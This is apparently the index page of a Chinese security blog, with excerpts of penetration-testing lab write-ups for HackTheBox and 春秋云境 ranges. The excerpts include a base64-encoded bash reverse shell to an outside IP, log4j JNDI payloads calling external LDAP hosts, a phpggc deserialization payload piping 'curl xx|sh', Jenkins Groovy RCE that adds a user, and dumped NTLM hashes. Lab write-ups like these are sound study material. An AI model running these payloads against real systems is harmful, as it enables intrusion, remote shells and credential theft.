心流 - Still mind runs deep.

谁家逆天代码😡 [图片]连通了两个宵，搭了几个小网站玩玩。Alist终于又搭起来了🥱在家里天天熬大夜，过上美国时间了💀当家乡入冬的时候列车到站以后小时候的风再吹过逆天长城杯，还好进了，题目难度不一样按照排序也不加权😓，还好进了，虽然是倒数前十名。太美丽了广州，还好玩了，不玩后悔一辈子，有机会还去。✌ [图片]终于让我干进决赛了！你们学的这么快，真的是人吗？

yuque-export 语雀文档批量导出

荐

0xGame 2023 部分题目复现与学习

荐

2023 WMCTF 部分题目复现

荐

2024 CISCN 华南赛区分区赛赛后吐槽

荐

2024 CISCN 决赛赛后学习与总结

荐

2024 D^3CTF x 凌武杯部分题目复现

CTF

Penetration

Range

最新未读

HacktheBox-Rebound

发表于2025-04-042025-04-04 WriteUp HackTheBox

前言那天看到有某 up 在讲这个，找个时间学习下。给 AD 域的细节串串。跟着 wp 照着打一遍，学学。信息收集nmap 扫下 1nmap -p- --min-rate 1000 10.10.11.231 12345678910111213141516171819202122232425262728293031Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 18:59 CSTNmap scan report for 10.10.11.231Host is up (0.41s latency).Not shown: 65509 closed tcp ports (reset)PORT STATE SERVICE53/tcp open domain88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp ...

Penetration

Range

未读

春秋云境-Privilege

发表于2025-03-222025-04-04 WriteUp 春秋云境

flag01在 80 端口的 wp 下面有个 www.zip。 tools/content-log.php 下面有个文件读取。权限很高，能直接读到 flag。应该是 xp 起的 flag028080 下面有个 jenkins，读取 jenkins 的密码： 1C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword 510235cf43f14e83b88a9f144199655b 然后 admin:510235cf43f14e83b88a9f144199655b登录。我记得这里之前打 ciscn 决赛的时候遇到过，当时直接走 pipeline CI 这种格式 rce 的。这里又看了一眼别人的方法，在/manage/script下面用 groovy 的语法实现 RCE： 1println("whoami".execute().text) 12println("net user natro92 123qwe!@# /add".execute().text)println(& ...

Penetration

Range

未读

春秋云境-Delivery

发表于2025-03-212025-04-04 WriteUp 春秋云境

flag01外网有一个 ftp 里面有个 pom.xml 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> ...

Penetration

Range

未读

春秋云境-Flarum

发表于2025-03-202025-04-04 WriteUp 春秋云境

flag01 从偶遇 Flarum 开始的 RCE 之旅上来是个爆破，administrator:1chris P 牛这个洞就是@import引入伪协议，将结果写入 css，再data-uri('phar://./assets/forum.css')触发 phar 反序列化。先打开 phar 写入权限：找到 php.ini: 1php -r "phpinfo();" 修改：phar.readonly = Off 然后直接用 phpgcc 生成 phar 包： 1php phpggc -p tar -b Monolog/RCE6 system "curl xx|sh" 然后直接在其中用 data 的 base64 协议引用： 1@import (inline) 'data:text/css;base64,dxxxxAAAAAAA......'; 主页查看 css 发现已经可以控制，然后加载 phar 反序列化。 123.test { content: data-uri("p ...

Penetration

Range

未读

春秋云境-Certify

发表于2025-03-132025-04-04 WriteUp 春秋云境

flag01扫下有 8983 端口。有 solr 服务，第一个想到的肯定是 log4j 1http://39.98.126.194:8983/solr/admin/collections?action=${jndi:ldap://5lpj8t5l.eyes.sh} GitHub - k4i-x3i0/jndiExploit-beta: 魔改版，实现冰蝎直连内存马，无需修改冰蝎客户端 1java -jar JNDIExploit-beta.jar -i xxx 1http://xxxx:8983/solr/admin/collections?action=${jndi:ldap://8.129.237.128:1389/Basic/ReverseShell/xxx/8083} sudo -l 提权 flag02扫下 1./fscan -h 172.22.9.19/24 -eh 172.22.9.19 1234567891011121314151617181920212223242526272829303132333 ...

Penetration

Range

未读

春秋云境-Time

发表于2025-03-122025-04-04 WriteUp 春秋云境

flag01扫下目标 ip 1337 端口是一个 neo4j,有 nday 直接打： GitHub - zwjjustdoit/CVE-2021-34371.jar: CVE-2021-34371.jar 直接弹 shell 1java -jar .\rhino_gadget.jar rmi://39.99.136.242:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU5LjE0OC42OC84MDgzIDA+JjE=}|{base64,-d}|{bash,-i}" flag02fscan 扫下 123456789101112131415161718192021222324252627282930[2025-03-12 15:39:45] [HOST] 目标:172.22.6.12 状态:alive 详情:protocol=ICMP[2025-03-12 15:39:48] [HOST] 目标:172.22.6.25 状态:a ...

Penetration

Range

未读

春秋云境-无间计划

发表于2025-03-112025-04-04 WriteUp 春秋云境

会员日半价捏，打过十二点了艹了还没用上原价，为什么半价打过十二点之后所有的都按原价算。。好贵啊我日 flag01上来俩 ip： 123439.98.124.24439.99.147.240 123456789101112131415161718192021222324252627282930313233343536373839404142[2025-03-10 19:37:38] [INFO] 暴力破解线程数: 1[2025-03-10 19:37:38] [INFO] 开始信息扫描[2025-03-10 19:37:38] [INFO] 最终有效主机数量: 1[2025-03-10 19:37:38] [INFO] 开始主机扫描[2025-03-10 19:37:38] [INFO] 有效端口数量: 233[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:80[2025-03-10 19:37:38] [SUCCESS] 端口开放 39.98.124.244:22[2025-03-10 19:37:38] [SUCCESS] 服 ...

Penetration

Range

未读

春秋云境-Initial

发表于2025-03-102025-04-04 WriteUp 春秋云境

flag01TP5.0.23 RCE 权限低，先看 suid：FFFF 1find / -user root -perm -4000 -print 2> result.txt 没有熟悉的，看看 sudo -l 有 mysql flag{60b53231- fscan 一下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647[2025-03-10 17:44:52] [HOST] 目标:172.22.1.15 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.2 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.21 状态:alive 详情:protocol=ICMP[2025-03-10 17:44:52] [HOST] 目标:172.22.1.18 状态:alive 详情:p ...

Penetration

Range

未读

春秋云境-Brute4Road

发表于2025-03-092025-04-04 WriteUp 春秋云境

flag01123456789101112131415161718192021[2025-03-09 20:26:33] [INFO] 暴力破解线程数: 1[2025-03-09 20:26:33] [INFO] 开始信息扫描[2025-03-09 20:26:33] [INFO] 最终有效主机数量: 1[2025-03-09 20:26:33] [INFO] 开始主机扫描[2025-03-09 20:26:34] [INFO] 有效端口数量: 233[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:6379[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:21[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:80[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:22[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:21 => [ft ...

Penetration

Range

未读

春秋云境-Tsclient

发表于2025-03-082025-04-04 WriteUp 春秋云境

flag01fscan 扫一下。直接能扫到 1433 端口的密码： 1sa 1qaz!QAZ 命令直接上线就好了。但是权限太低了。 sweetpotato 提权给 cs 上线： flag02看 flag 的时候发现还有个 john 用户。 1logonpasswords 没有明文密码，拿到 john 的 hash。 1234Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf35bb4c5059a3d50599844e2b9b1f:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::John:1008:aad3b435b51404eeaad3b435b51404ee:eec9381b043f098b011be51622282027::: 查 ...

Natro92